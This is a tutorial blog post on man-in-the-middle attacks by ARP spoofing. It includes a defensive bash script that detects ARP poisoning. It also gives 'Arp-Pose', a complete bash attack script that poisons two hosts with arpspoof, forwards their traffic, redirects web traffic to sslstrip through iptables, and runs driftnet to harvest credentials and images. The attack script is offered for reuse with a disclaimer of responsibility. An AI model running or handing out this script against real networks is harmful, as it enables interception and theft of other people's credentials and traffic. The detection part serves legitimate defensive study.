Attack Scripting 101: The MiTM
After a while of learning how to perform attacks and exploits it becomes monotonous, your memory dulls, and your knowledge of certain attacks wanes. This is a common occurrence among penetration testers and hackers alike. Many of them have come up with ways to get past this memory block, and the most common way of keeping the information in a usable form is writing some kind of attack script that automates your exploits and attacks. Today I will explain the MiTM, or Man in the Middle, attack and how to write an attack script that automates it. I cannot be held accountable for anything you do with this script.
Choosing your Language
To start with, if you already know a programming language and are proficient with it, feel free to adapt the script to suit your needs and comfort level. I am going to be using BASH in my examples.
I make it a rule and a habit that any automation I code myself stays extendable: every variable is changeable and the script is kept as a piece of software I will reuse. It's not your place to re-invent the wheel, only to make it roll more efficiently, and in essence that's all you're trying to do.
The MiTM Explanation
A Man in the Middle Attack is an attack in which you essentially tell two targets that you are the other. Both then send you the data meant for the other, and you turn on IP forwarding in the kernel so that traffic passes through your machine to the correct host (IPTables, in our case, is used on top of that to redirect the port-80 traffic into a tool of our choosing). You are now essentially a router, and as a router you can turn on a sniffer and capture all of the data going between the targets. This form of attack is especially common on local networks, so watch for it on public networks. The specific attack we are going to use is known as ARP Spoofing. ARP maps IP addresses to MAC addresses on a LAN, and hosts accept ARP replies without checking them, so you send each target forged replies that map the other target's IP to your MAC; both ARP tables now point at you and the traffic follows. Because ARP is a link-layer protocol, ARP spoofing works across a switched network (a switch splits the LAN into separate collision domains but not into separate broadcast domains), but it does not cross a router: you and both targets must sit in the same broadcast domain, that is, the same LAN segment or VLAN.
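Since the attack leaves a visible trace in the victims' ARP tables (the attacker's MAC answering for two IPs, and the gateway's MAC changing), here is the check I would run on a network where I suspect it. This is an added example, not code from the original post: it parses `ip -4 neigh` output on Linux, the sample lines fed to it are constructed, and the "pinned" gateway MAC is assumed to have been recorded earlier from a known-good session.

```bash
#!/bin/bash
# Spot ARP poisoning from the victim's side: one MAC claiming several IPs,
# or the gateway's MAC drifting from a pinned baseline.
# Input is the output of `ip -4 neigh` (Linux), one entry per line, e.g.
#   192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
# Entries without a resolved MAC (FAILED/INCOMPLETE) carry no "lladdr" field.

# Constructed sample: the host .42 is the attacker, and the gateway .1 now
# resolves to the attacker's MAC as well.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:20 STALE
192.168.1.42 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.50 dev eth0 FAILED'

# Print "mac ip1 ip2 ..." for every MAC that appears against two or more IPs.
# Reads `ip -4 neigh` lines from stdin.
find_duplicate_macs() {
    awk '
        $4 == "lladdr" {
            ip = $1; mac = tolower($5)
            if (mac in count) { ips[mac] = ips[mac] " " ip; count[mac]++ }
            else { ips[mac] = ip; count[mac] = 1 }
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# Compare the gateway's current MAC with the pinned one.
# $1 = gateway IP, $2 = pinned MAC (assumed recorded earlier); stdin as above.
# Prints ok / CHANGED ... / unknown and returns 0 / 1 / 2 respectively.
check_gateway_mac() {
    local gw="$1" expected seen
    expected=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    seen=$(awk -v gw="$gw" '$1 == gw && $4 == "lladdr" { print tolower($5) }')
    if [ -z "$seen" ]; then
        echo "unknown"; return 2          # gateway not in the cache at all
    elif [ "$seen" = "$expected" ]; then
        echo "ok"; return 0
    else
        echo "CHANGED $expected -> $seen"; return 1
    fi
}

# Demo against the constructed sample; on a real host replace the printf with
#   ip -4 neigh | find_duplicate_macs
printf '%s\n' "$SAMPLE_NEIGH" | find_duplicate_macs
printf '%s\n' "$SAMPLE_NEIGH" | check_gateway_mac 192.168.1.1 aa:bb:cc:dd:ee:01
```

Run it from cron or a loop and alert on a non-zero status from `check_gateway_mac` or any output from `find_duplicate_macs`. A MAC legitimately owning two IPs (a host with an alias, a router with several addresses) will also show up, so treat the duplicate list as something to eyeball, and the gateway-MAC change as the strong signal.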
The MiTM Automation Code
This is just a rough BASH script that lets you ARP-poison two hosts on a network and then pull credentials: anything sent in the clear over HTTP, plus whatever sslstrip can coax out of HTTPS sessions by rewriting the links the target follows to plain HTTP (it does not help against sites that enforce HTTPS with HSTS). I'm not going to go into too much detail about the methods I used to actually ARP-poison the network, as that will be in another guide; I am simply trying to help you understand the basics. It has to run as root and needs arpspoof (from dsniff), iptables, driftnet, sslstrip and xterm installed.

```bash
#!/bin/bash
# Arp-Pose: ARP-poison two hosts, route their traffic through this box,
# hand the port-80 traffic to sslstrip and let driftnet pull images.
echo "Hello and Welcome to Arp-Pose"
echo ""
echo ""
echo "Please enter your Target's IP"
read -r Target
echo "Please enter your Target2's IP"
read -r Target2
echo "Please enter your Interface"
read -r Interface

# Cleanup Process: runs when sslstrip's window closes or the script is interrupted,
# so forwarding and the NAT rule never stay behind on the box.
cleanup() {
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    pkill driftnet
    pkill arpspoof   # arpspoof restores the real ARP entries when it exits
}
trap cleanup EXIT

# Forward packets between the two targets instead of dropping them.
echo "1" > /proc/sys/net/ipv4/ip_forward
# Poison both directions so each target sends the other's traffic to us
# (redirects go before the & so the background jobs stay quiet).
arpspoof -i "$Interface" -t "$Target" "$Target2" > /dev/null 2>&1 &
arpspoof -i "$Interface" -t "$Target2" "$Target" > /dev/null 2>&1 &
# Send the forwarded port-80 traffic to sslstrip listening on 10000.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
driftnet -i "$Interface" > /dev/null 2>&1 &
# sslstrip runs in the foreground window; closing it ends the attack.
xterm -e "python /pentest/web/sslstrip/sslstrip.py -p 10000"
```
Tips and Tricks
- Don't rewrite functionality that a program already provides.
- Don't get too hung up on any programming language; use the right tool for the job.
- Don't get locked into a small scope: write all of your scripts so they are highly configurable for different situations.
- Choose a naming system and stick with it, e.g. mitm.sh, dnsspoof.sh, autowepcrack.sh.
- Enjoy and don’t be afraid to ask for help!